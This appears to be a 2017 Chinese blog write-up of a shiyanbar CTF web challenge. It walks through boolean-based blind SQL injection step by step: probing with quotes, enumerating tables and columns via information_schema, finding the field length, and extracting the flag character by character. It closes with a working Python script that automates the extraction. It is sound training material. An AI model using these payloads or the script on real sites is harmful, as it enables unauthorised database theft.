【实验吧】CTF_Web_简单的SQL注入之3

 

 

实验吧第二题 who are you? 很有意思,过两天好好分析写一下。简单的SQL注入之3也很有意思,适合做手工练习,详细分析见下。

http://ctf5.shiyanbar.com/web/index_3.php  随便输入111' 便报错,由报错内容可知较多信息:

通过 1' and '1'='1 返回正确, 1' and '1'='2 返回错误可知,当输入正确值的时候返回hello,输入错误值无显示,且过滤了sleep()。
进行猜解表名: 方法一:1' and (select count(*) from 表名) > 0 # 即 http://ctf5.shiyanbar.com/web/index_3.php?id=1%27+and+exists(select+*+from+表名)+%3E+0+%23

                         方法二: 1' and (select count(*) from aaa) > 0 # 即 http://ctf5.shiyanbar.com/web/index_3.php?id=1%27+and+%28select+*+from+aaa%29+%3E+0+%23 报错可得数据库为“web1”。

                        

 

通过fuzz,可知存在flag表

再利用1' and(select count(*) from information_schema.columns where table_schema='web1' and table_name='flag') > 1 # ,返回正确,>2 无返回,可知flag表有2列,
即http://ctf5.shiyanbar.com/web/index_3.php?id=1%27+and%28select+count%28*%29+from+information_schema.columns+where+table_schema%3D%27web1%27+and+table_name%3D%27flag%27%29+%3E+3+%23

猜列名: 1' and (select 列名 from flag) > -1# 或1'union select 列名 from flag,放在burp中进行爆破,列名存在输出hello,不存在就报错。如下,存在flag和id两列

猜字段长度: 1'+and(select+length(flag)+from+flag)>25%23# 和 1'+and(select+length(flag)+from+flag)>27%23#,大于25返回hello即正确,小于27返回空即错误,可知一共有26个字符。
猜字段: 1'and ascii(substr(select flag from flag),1,1)= 110#

 

将上面的payload2 按照数值排序为:102 108 97 103 123 89 48 117 95 64 114 51 95 53 79 95 100 65 109 110 95 57 48 79 100 125,利用burp自带转码工具转换(先hex,然后ascii)即可得flag{Y0u_@r3_5O_dAmn_90Od}

 

 

附一个python3的脚本及运行截图:

#!/usr/bin/env python3
#coding:utf-8

import sys
import re
import urllib.request
import http.client

headers = {'Content-Type': 'application/x-www-form-urlencoded'}

flag = ''
print("Start SQLi")

for i in range(1,27):
    for payload in range(30,127):
        sys.stdout.write('.')
        sys.stdout.flush()
        conn = http.client.HTTPConnection('ctf5.shiyanbar.com',timeout=60)
        s = "/web/index_3.php?id=1'+and+ascii(substr((select+flag+from+flag)%2C{0}%2C1))+%3D{1}%23".format(i,payload)

        conn.request(method='GET',url=s,headers=headers)
        response = conn.getresponse().read().decode('utf-8')
        conn.close()
        
        if response.find(str('Hello')) >0:
            flag += chr(payload)         
            print(i,chr(payload))
            break
print('Done! flag is {0}'.format(flag))

 

posted @ 2017-11-16 22:37  Fint0p  阅读(6826)  评论(3编辑  收藏